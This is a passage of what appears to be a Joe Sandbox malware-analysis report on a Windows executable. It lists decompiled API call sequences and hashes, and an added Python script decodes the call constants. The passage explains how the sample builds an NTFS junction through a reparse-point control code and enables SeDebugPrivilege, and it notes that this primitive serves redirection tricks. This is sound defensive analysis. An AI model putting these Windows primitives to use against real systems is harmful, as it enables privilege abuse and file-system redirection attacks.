                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101883423.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_AENiBH7X1q.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                                                                                                                                • String ID: PF$'|G$*"D$*vG$+%F$0wE$2G$5CG$7eF$<HF$<G$ApG$DvE$GSG$IqE$K@G$LbF$MdF$NgF$PIF$YtG$^[F$_?G$b"D$i}G$j)F$kQG$lE$rTG$vjE$}eE$*F$3G$_G$wG
                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 0-3772701627
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: bb854585b2a8d25cf70b859c951904b6599901827447d171664d6ae6ba41e592
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: b1e67458769bbea4a86cd8903524db5b6e79558e2e7ab8c51025fc7bd56032a7
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: bb854585b2a8d25cf70b859c951904b6599901827447d171664d6ae6ba41e592
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 118366F1905B409FC351DFAAF984605BAE1F3AA3157A2857FC5088B731D7B8194A8F4C
                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                • GetForegroundWindow.USER32(00000000,?,?,004448AF,?), ref: 004375B3
                                                                                                                                                                                                                                                                                                                                                                                                                • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 004375D8
                                                                                                                                                                                                                                                                                                                                                                                                                • IsIconic.USER32(?), ref: 004375E1
                                                                                                                                                                                                                                                                                                                                                                                                                • ShowWindow.USER32(?,00000009,?,?,004448AF,?), ref: 004375EE
                                                                                                                                                                                                                                                                                                                                                                                                                • SetForegroundWindow.USER32(?), ref: 004375FD
                                                                                                                                                                                                                                                                                                                                                                                                                • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00437615
                                                                                                                                                                                                                                                                                                                                                                                                                • GetCurrentThreadId.KERNEL32 ref: 00437619
                                                                                                                                                                                                                                                                                                                                                                                                                • GetWindowThreadProcessId.USER32(?,00000000), ref: 00437624
                                                                                                                                                                                                                                                                                                                                                                                                                • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,004448AF,?), ref: 00437632
                                                                                                                                                                                                                                                                                                                                                                                                                • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,004448AF,?), ref: 00437638
                                                                                                                                                                                                                                                                                                                                                                                                                • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,004448AF,?), ref: 0043763E
                                                                                                                                                                                                                                                                                                                                                                                                                • SetForegroundWindow.USER32(?), ref: 00437645
                                                                                                                                                                                                                                                                                                                                                                                                                • MapVirtualKeyW.USER32(00000012,00000000), ref: 00437654
                                                                                                                                                                                                                                                                                                                                                                                                                • keybd_event.USER32(00000012,00000000), ref: 0043765D
                                                                                                                                                                                                                                                                                                                                                                                                                • MapVirtualKeyW.USER32(00000012,00000000), ref: 0043766B
                                                                                                                                                                                                                                                                                                                                                                                                                • keybd_event.USER32(00000012,00000000), ref: 00437674
                                                                                                                                                                                                                                                                                                                                                                                                                • MapVirtualKeyW.USER32(00000012,00000000), ref: 00437682
                                                                                                                                                                                                                                                                                                                                                                                                                • keybd_event.USER32(00000012,00000000), ref: 0043768B
                                                                                                                                                                                                                                                                                                                                                                                                                • MapVirtualKeyW.USER32(00000012,00000000), ref: 00437699
                                                                                                                                                                                                                                                                                                                                                                                                                • keybd_event.USER32(00000012,00000000), ref: 004376A2
                                                                                                                                                                                                                                                                                                                                                                                                                • SetForegroundWindow.USER32(?), ref: 004376AD
                                                                                                                                                                                                                                                                                                                                                                                                                • AttachThreadInput.USER32(00000000,00000000,00000000,?,?,004448AF), ref: 004376CD
                                                                                                                                                                                                                                                                                                                                                                                                                • AttachThreadInput.USER32(00000000,00000000,00000000,?,?,004448AF), ref: 004376D3
                                                                                                                                                                                                                                                                                                                                                                                                                • AttachThreadInput.USER32(00000000,00000000,00000000,?,?,004448AF), ref: 004376D9
                                                                                                                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2101757388.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101736620.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101824558.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101883423.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_AENiBH7X1q.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: Thread$Window$AttachInput$ForegroundVirtualkeybd_event$Process$CurrentFindIconicShow
                                                                                                                                                                                                                                                                                                                                                                                                                • String ID: Shell_TrayWnd
                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 3778422247-2988720461
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: ec12ba9e870cc2e5dd85ad52799cb15a6745d125a488419c4f0ebb71fc1ee38e
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: 6108fbe056c1a000d5481f33e03d330ccc862392245923d3170deea12ea07584
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: ec12ba9e870cc2e5dd85ad52799cb15a6745d125a488419c4f0ebb71fc1ee38e
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: AC31A4712803157FE6245BA59D0EF7F3F9CEB48B51F10082EFA02EA1D1DAE458009B79
                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                • _memset.LIBCMT ref: 0044621B
                                                                                                                                                                                                                                                                                                                                                                                                                • DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?,?,?,?,?,?,?,?,?,?,?), ref: 00446277
                                                                                                                                                                                                                                                                                                                                                                                                                • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0044628A
                                                                                                                                                                                                                                                                                                                                                                                                                • OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 004462A4
                                                                                                                                                                                                                                                                                                                                                                                                                • GetProcessWindowStation.USER32(?,?,?,?,?,?,?,?,?,?,?,?), ref: 004462BD
                                                                                                                                                                                                                                                                                                                                                                                                                • SetProcessWindowStation.USER32(00000000,?,?,?,?,?,?,?,?,?,?,?,?), ref: 004462C8
                                                                                                                                                                                                                                                                                                                                                                                                                • OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 004462E4
                                                                                                                                                                                                                                                                                                                                                                                                                • _wcslen.LIBCMT ref: 0044639E
                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 0041171A: _malloc.LIBCMT ref: 00411734
                                                                                                                                                                                                                                                                                                                                                                                                                • _wcsncpy.LIBCMT ref: 004463C7
                                                                                                                                                                                                                                                                                                                                                                                                                • LoadUserProfileW.USERENV(?,00000000,00000000,?,?,00000000,?,?,?,?), ref: 004463E7
                                                                                                                                                                                                                                                                                                                                                                                                                • CreateEnvironmentBlock.USERENV(?,?,00000000,00000000,?,?,00000000,?,?,?,?), ref: 00446408
                                                                                                                                                                                                                                                                                                                                                                                                                • CreateProcessAsUserW.ADVAPI32(?,00000000,00000000,00000000,00000000,?,?,?,?,?,?,00000000,?,?,00000000,?), ref: 00446446
                                                                                                                                                                                                                                                                                                                                                                                                                • UnloadUserProfile.USERENV(?,?,?,?,?,?,?), ref: 00446483
                                                                                                                                                                                                                                                                                                                                                                                                                • CloseWindowStation.USER32(00000000,?,?,?,?), ref: 00446497
• CloseDesktop.USER32(00000000,?,?,?,?), ref: 0044649E
• SetProcessWindowStation.USER32(?,?,?,?,?), ref: 004464A9
• CloseHandle.KERNEL32(?,?,?,?,?), ref: 004464B4
• DestroyEnvironmentBlock.USERENV(?,?,?,?,?,?), ref: 004464C8
Strings
Memory Dump Source
• Source File: 00000000.00000002.2101757388.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2101736620.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101824558.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101844737.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101844737.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101883423.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_AENiBH7X1q.jbxd
Similarity
• API ID: StationWindow$CloseProcess$User$BlockCreateDesktopEnvironmentHandleOpenProfile$DestroyDuplicateLoadTokenUnload_malloc_memset_wcslen_wcsncpy
• String ID: $default$winsta0
• API String ID: 2173856841-1027155976
• Opcode ID: 60466c812311f25fb86c91292e7101a774af41f6c0f7563e11afd4658bd94aff
• Instruction ID: eafd5d154f9bcf2590b8f8eb1e0f3d39b01f77f2fd200ee1cb9c7344d9c52646
• Opcode Fuzzy Hash: 60466c812311f25fb86c91292e7101a774af41f6c0f7563e11afd4658bd94aff
• Instruction Fuzzy Hash: DD819170208341AFE724DF65C848B6FBBE8AF89744F04491DF69097291DBB8D805CB6B
APIs
  • Part of subcall function 0040FFB0: GetFullPathNameW.KERNEL32(00000000,00000104,C:\Users\user\Desktop\AENiBH7X1q.exe,?,C:\Users\user\Desktop\AENiBH7X1q.exe,004A8E80,C:\Users\user\Desktop\AENiBH7X1q.exe,0040F3D2), ref: 0040FFCA
  • Part of subcall function 00436A1D: __wsplitpath.LIBCMT ref: 00436A45
  • Part of subcall function 00436A1D: __wsplitpath.LIBCMT ref: 00436A6C
  • Part of subcall function 00436A1D: __wcsicoll.LIBCMT ref: 00436A93
  • Part of subcall function 00436AC4: GetFileAttributesW.KERNEL32(?,0044BD82,?,?,?), ref: 00436AC9
• _wcscat.LIBCMT ref: 0044BD96
• _wcscat.LIBCMT ref: 0044BDBF
• __wsplitpath.LIBCMT ref: 0044BDEC
• FindFirstFileW.KERNEL32(?,?), ref: 0044BE04
• _wcscpy.LIBCMT ref: 0044BE73
• _wcscat.LIBCMT ref: 0044BE85
• _wcscat.LIBCMT ref: 0044BE97
• lstrcmpiW.KERNEL32(?,?), ref: 0044BEC3
• DeleteFileW.KERNEL32(?), ref: 0044BED5
• MoveFileW.KERNEL32(?,?), ref: 0044BEF5
• CopyFileW.KERNEL32(?,?,00000000), ref: 0044BF0C
• DeleteFileW.KERNEL32(?), ref: 0044BF17
• CopyFileW.KERNEL32(?,?,00000000), ref: 0044BF2E
• FindClose.KERNEL32(00000000), ref: 0044BF35
• MoveFileW.KERNEL32(?,?), ref: 0044BF51
• FindNextFileW.KERNEL32(00000000,00000010), ref: 0044BF66
• FindClose.KERNEL32(00000000), ref: 0044BF7E
Strings
Memory Dump Source
• Source File: 00000000.00000002.2101757388.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2101736620.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101824558.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101844737.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101844737.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101883423.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_AENiBH7X1q.jbxd
Similarity
• API ID: File$Find_wcscat$__wsplitpath$CloseCopyDeleteMove$AttributesFirstFullNameNextPath__wcsicoll_wcscpylstrcmpi
• String ID: \*.*
• API String ID: 2188072990-1173974218
• Opcode ID: 37b83e77465c63a9a0fc5a2f65b261a2e9867c78515d1bc57cb11e6e3b171851
• Instruction ID: 14f7055b3521afb04026f42b490306401b0ba37f80ed0ea0ca267746d8cc4687
• Opcode Fuzzy Hash: 37b83e77465c63a9a0fc5a2f65b261a2e9867c78515d1bc57cb11e6e3b171851
• Instruction Fuzzy Hash: CA5166B2008344AAD720DBA4DC44FDF73E8AB85314F448D1EF68982141EB79D64CCBAA
APIs
• GetFullPathNameW.KERNEL32(?,00000104,?,?), ref: 00434D75
• __swprintf.LIBCMT ref: 00434D91
• _wcslen.LIBCMT ref: 00434D9B
• _wcslen.LIBCMT ref: 00434DB0
• _wcslen.LIBCMT ref: 00434DC5
• CreateDirectoryW.KERNEL32(?,00000000), ref: 00434DD7
• CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000003,02200000,00000000), ref: 00434E0A
• _memset.LIBCMT ref: 00434E27
• _wcslen.LIBCMT ref: 00434E3C
• _wcsncpy.LIBCMT ref: 00434E6F
• DeviceIoControl.KERNEL32(00000000,000900A4,?,?,00000000,00000000,?,00000000), ref: 00434EA9
• CloseHandle.KERNEL32(00000000), ref: 00434EB4
• RemoveDirectoryW.KERNEL32(?), ref: 00434EBB
• CloseHandle.KERNEL32(00000000), ref: 00434ECE
Strings
                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2101757388.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101736620.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101824558.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101883423.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_AENiBH7X1q.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: _wcslen$CloseCreateDirectoryHandle$ControlDeviceFileFullNamePathRemove__swprintf_memset_wcsncpy
                                                                                                                                                                                                                                                                                                                                                                                                                • String ID: :$\$\??\%s
                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 302090198-3457252023
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: 1623bec2b974bb3ee5261838648fb58b2a9d6db5aa255760d49714c370e47f4e
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: 730b2dca1b6b09bd6b76555d3316dee95f4818bcffb97f26f8f03165767cfd2f
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 1623bec2b974bb3ee5261838648fb58b2a9d6db5aa255760d49714c370e47f4e
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 30416676604340ABE330EB64DC49FEF73E8AFD8714F00891EF649921D1E7B4A645876A
APIs
  • Part of subcall function 00444233: _wcslen.LIBCMT ref: 0044424E
• OpenProcess.KERNEL32(00000001,00000000,?), ref: 0046449E
• GetLastError.KERNEL32 ref: 004644B4
• GetCurrentThread.KERNEL32 ref: 004644C8
• OpenThreadToken.ADVAPI32(00000000), ref: 004644CF
• GetCurrentProcess.KERNEL32(00000028,?), ref: 004644E0
• OpenProcessToken.ADVAPI32(00000000), ref: 004644E7
Strings
Memory Dump Source
• Source File: 00000000.00000002.2101757388.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2101736620.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101824558.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101844737.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101844737.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101883423.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_AENiBH7X1q.jbxd
Similarity
• API ID: OpenProcess$CurrentThreadToken$ErrorLast_wcslen
• String ID: SeDebugPrivilege
• API String ID: 1312810259-2896544425
• Opcode ID: bb2abcbadcb50e0008f3b1fe3e217bfa736f6ade076d8095da49bf04f95d98f8
• Instruction ID: c3f5e6af55eb0da9fa74db60d4f5a84adac3a89a74612fbe59a223ef38337450
• Opcode Fuzzy Hash: bb2abcbadcb50e0008f3b1fe3e217bfa736f6ade076d8095da49bf04f95d98f8
• Instruction Fuzzy Hash: 0E51A171200201AFD710DF65DD85F5BB7A8AB84704F10892EFB44DB2C1D7B8E844CBAA
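The report prints the call arguments as raw hex and leaves them to the reader. The two functions above carry the constants that matter: in the first, CreateFileW opens with 0x40000000 and flags 0x02200000 and DeviceIoControl issues control code 0x000900A4 against a "\??\%s" target, with RemoveDirectoryW as cleanup; in the second, the process token is opened with 0x28 next to the string SeDebugPrivilege. Decoded, the first sequence is GENERIC_WRITE, OPEN_EXISTING, FILE_FLAG_BACKUP_SEMANTICS|FILE_FLAG_OPEN_REPARSE_POINT and FSCTL_SET_REPARSE_POINT, which is the standard way to turn a freshly created directory into an NTFS mount point (junction) pointing at an NT-namespace path; the second is TOKEN_ADJUST_PRIVILEGES|TOKEN_QUERY, the access needed to enable a privilege with AdjustTokenPrivileges. The decoder below is an added example and is not part of the Joe Sandbox report or its IDA plugin. It parses lines in the report's "API.MODULE(args), ref: address" layout (the four sample lines are copied from this page) and undoes the CTL_CODE packing and the Win32 bitmasks; the SDK constant values are the documented ones, and the reading of the 0x28 shown on the GetCurrentProcess line as OpenProcessToken's DesiredAccess is an interpretation, noted as such in the code.

```python
import re

# Constructed input: four call lines copied in the layout the report uses
# ("API.MODULE(args), ref: address"). Values are the ones shown on this page.
SAMPLE_LINES = [
    "• CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000003,02200000,00000000), ref: 00434E0A",
    "• DeviceIoControl.KERNEL32(00000000,000900A4,?,?,00000000,00000000,?,00000000), ref: 00434EA9",
    "• OpenProcess.KERNEL32(00000001,00000000,?), ref: 0046449E",
    "• GetCurrentProcess.KERNEL32(00000028,?), ref: 004644E0",
]

CALL_RE = re.compile(
    r"(?P<api>\w+)\.(?P<mod>\w+)\((?P<args>[^)]*)\),\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)")

# Bit tables with the documented Win32 SDK values. A '?' argument is one the plugin could not resolve.
DESIRED_ACCESS = [(0x80000000, "GENERIC_READ"), (0x40000000, "GENERIC_WRITE"),
                  (0x20000000, "GENERIC_EXECUTE"), (0x10000000, "GENERIC_ALL")]
CREATE_FLAGS = [(0x04000000, "FILE_FLAG_DELETE_ON_CLOSE"), (0x02000000, "FILE_FLAG_BACKUP_SEMANTICS"),
                (0x00200000, "FILE_FLAG_OPEN_REPARSE_POINT"), (0x40000000, "FILE_FLAG_OVERLAPPED"),
                (0x00000080, "FILE_ATTRIBUTE_NORMAL")]
PROCESS_ACCESS = [(0x0001, "PROCESS_TERMINATE"), (0x0002, "PROCESS_CREATE_THREAD"),
                  (0x0008, "PROCESS_VM_OPERATION"), (0x0010, "PROCESS_VM_READ"),
                  (0x0020, "PROCESS_VM_WRITE"), (0x0400, "PROCESS_QUERY_INFORMATION"),
                  (0x1000, "PROCESS_QUERY_LIMITED_INFORMATION")]
TOKEN_ACCESS = [(0x0001, "TOKEN_ASSIGN_PRIMARY"), (0x0002, "TOKEN_DUPLICATE"), (0x0004, "TOKEN_IMPERSONATE"),
                (0x0008, "TOKEN_QUERY"), (0x0010, "TOKEN_QUERY_SOURCE"), (0x0020, "TOKEN_ADJUST_PRIVILEGES"),
                (0x0040, "TOKEN_ADJUST_GROUPS"), (0x0080, "TOKEN_ADJUST_DEFAULT")]
DISPOSITION = {1: "CREATE_NEW", 2: "CREATE_ALWAYS", 3: "OPEN_EXISTING", 4: "OPEN_ALWAYS", 5: "TRUNCATE_EXISTING"}
METHODS = ["METHOD_BUFFERED", "METHOD_IN_DIRECT", "METHOD_OUT_DIRECT", "METHOD_NEITHER"]
# (FILE_DEVICE_FILE_SYSTEM = 9, function number) -> FSCTL name for the reparse-point family.
FSCTL_NAMES = {(9, 41): "FSCTL_SET_REPARSE_POINT", (9, 42): "FSCTL_GET_REPARSE_POINT",
               (9, 43): "FSCTL_DELETE_REPARSE_POINT"}


def parse_call(line):
    """Split one report line into api, module, numeric args (None for '?') and ref address."""
    m = CALL_RE.search(line)
    if not m:
        return None
    raw = [a.strip() for a in m.group("args").split(",")] if m.group("args").strip() else []
    args = [None if a == "?" else int(a, 16) for a in raw]
    return {"api": m.group("api"), "module": m.group("mod"), "args": args, "ref": int(m.group("ref"), 16)}


def flags_to_names(value, table):
    """Expand a bitmask into symbolic names; bits not in the table are reported in hex."""
    names = [name for bit, name in table if (value & bit) == bit]
    rest = value
    for bit, _ in table:
        rest &= ~bit
    if rest:
        names.append(f"0x{rest:X}")
    return "|".join(names) if names else "0"


def decode_ioctl(code):
    """Undo CTL_CODE(): (DeviceType << 16) | (Access << 14) | (Function << 2) | Method."""
    device, access = code >> 16, (code >> 14) & 0x3
    function, method = (code >> 2) & 0xFFF, code & 0x3
    return {"device": device, "function": function, "method": METHODS[method], "access": access,
            "name": FSCTL_NAMES.get((device, function), "unknown")}


def annotate(call):
    """Decode the arguments of the calls that carry meaningful constants."""
    api, args = call["api"], call["args"]
    if api == "CreateFileW" and len(args) == 7:
        return {"access": flags_to_names(args[1], DESIRED_ACCESS),
                "disposition": DISPOSITION.get(args[4], "?"),
                "flags": flags_to_names(args[5], CREATE_FLAGS)}
    if api == "DeviceIoControl" and len(args) >= 2 and args[1] is not None:
        return decode_ioctl(args[1])
    if api == "OpenProcess" and args and args[0] is not None:
        return {"access": flags_to_names(args[0], PROCESS_ACCESS)}
    if api == "GetCurrentProcess" and args and args[0] is not None:
        # Interpretation: the plugin attributes values pushed before the call to GetCurrentProcess;
        # in the usual "push access; call GetCurrentProcess; push eax; call OpenProcessToken"
        # sequence that value is OpenProcessToken's DesiredAccess.
        return {"token_access": flags_to_names(args[0], TOKEN_ACCESS)}
    return {}


def decode_lines(lines):
    """Return {api: decoded fields} for every parseable line."""
    out = {}
    for line in lines:
        call = parse_call(line)
        if call:
            out[call["api"]] = annotate(call)
    return out


if __name__ == "__main__":
    for api, fields in decode_lines(SAMPLE_LINES).items():
        print(f"{api}: {fields}")
```

Run it over the lines copied from a report and compare the decoded flags against what the function's strings suggest: a CreateFileW with FILE_FLAG_OPEN_REPARSE_POINT followed by FSCTL_SET_REPARSE_POINT and a "\??\" format string is worth a closer look in the disassembly, because the same primitive serves both legitimate junction creation and file-system redirection tricks.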
APIs
  • Part of subcall function 00401B70: _wcslen.LIBCMT ref: 00401B71
• GetCurrentDirectoryW.KERNEL32(00000104,?,?), ref: 00403871
• GetFullPathNameW.KERNEL32(?,00000104,?,?), ref: 00403887
• __wsplitpath.LIBCMT ref: 004038B2
  • Part of subcall function 00413DB0: __wsplitpath_helper.LIBCMT ref: 00413DF2
• _wcscpy.LIBCMT ref: 004038C7
• _wcscat.LIBCMT ref: 004038DC
• SetCurrentDirectoryW.KERNEL32(?), ref: 004038EC
  • Part of subcall function 0041171A: _malloc.LIBCMT ref: 00411734
  • Part of subcall function 0041171A: std::bad_alloc::bad_alloc.LIBCMT ref: 00411757
  • Part of subcall function 0041171A: std::bad_exception::bad_exception.LIBCMT ref: 0041176B
  • Part of subcall function 0041171A: __CxxThrowException@8.LIBCMT ref: 00411779
  • Part of subcall function 00403F40: MultiByteToWideChar.KERNEL32(00000000,00000001,?,?,00000000,00000000,?,?,0040397D,?,?,00000010), ref: 00403F54
  • Part of subcall function 00403F40: MultiByteToWideChar.KERNEL32(00000000,00000001,?,?,00000000,00000000,00000000,?,00000010), ref: 00403F8B
• _wcscpy.LIBCMT ref: 004039C2
• _wcslen.LIBCMT ref: 00403A53
• _wcslen.LIBCMT ref: 00403AAA
Strings
• _, xrefs: 00403B48
• #include depth exceeded. Make sure there are no recursive includes, xrefs: 0042B87B
• Unterminated string, xrefs: 0042B9BA
• Error opening the file, xrefs: 0042B8AC
Memory Dump Source
• Source File: 00000000.00000002.2101757388.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2101736620.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101824558.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101883423.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_AENiBH7X1q.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: _wcslen$ByteCharCurrentDirectoryMultiWide_wcscpy$Exception@8FullNamePathThrow__wsplitpath__wsplitpath_helper_malloc_wcscatstd::bad_alloc::bad_allocstd::bad_exception::bad_exception
                                                                                                                                                                                                                                                                                                                                                                                                                • String ID: #include depth exceeded. Make sure there are no recursive includes$Error opening the file$Unterminated string$_
                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 4115725249-188983378
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: 3d47019ae40ddf295a6fa6cd32c8ae21ab53d4334480ddcc4f0e34d1fe96fec4
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: dca64db042171ec5605b2d10b6a92a42a2076cc25022adee7b8115af8a15fc96
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 3d47019ae40ddf295a6fa6cd32c8ae21ab53d4334480ddcc4f0e34d1fe96fec4
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 16D1D5B15083019AD710EF65C841AEB77E8AF95308F04492FF5C563292DB78DA49C7AB
                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                • FindFirstFileW.KERNEL32(?,?), ref: 00434C12
                                                                                                                                                                                                                                                                                                                                                                                                                • GetFileAttributesW.KERNEL32(?), ref: 00434C4F
                                                                                                                                                                                                                                                                                                                                                                                                                • SetFileAttributesW.KERNEL32(?,?), ref: 00434C65
                                                                                                                                                                                                                                                                                                                                                                                                                • FindNextFileW.KERNEL32(00000000,?), ref: 00434C77
                                                                                                                                                                                                                                                                                                                                                                                                                • FindClose.KERNEL32(00000000), ref: 00434C88
                                                                                                                                                                                                                                                                                                                                                                                                                • FindClose.KERNEL32(00000000), ref: 00434C9C
                                                                                                                                                                                                                                                                                                                                                                                                                • FindFirstFileW.KERNEL32(*.*,?), ref: 00434CB7
                                                                                                                                                                                                                                                                                                                                                                                                                • SetCurrentDirectoryW.KERNEL32(?), ref: 00434CFE
                                                                                                                                                                                                                                                                                                                                                                                                                • SetCurrentDirectoryW.KERNEL32(0048A090), ref: 00434D22
                                                                                                                                                                                                                                                                                                                                                                                                                • FindNextFileW.KERNEL32(00000000,00000010), ref: 00434D2A
                                                                                                                                                                                                                                                                                                                                                                                                                • FindClose.KERNEL32(00000000), ref: 00434D35
                                                                                                                                                                                                                                                                                                                                                                                                                • FindClose.KERNEL32(00000000), ref: 00434D43
                                                                                                                                                                                                                                                                                                                                                                                                                Strings
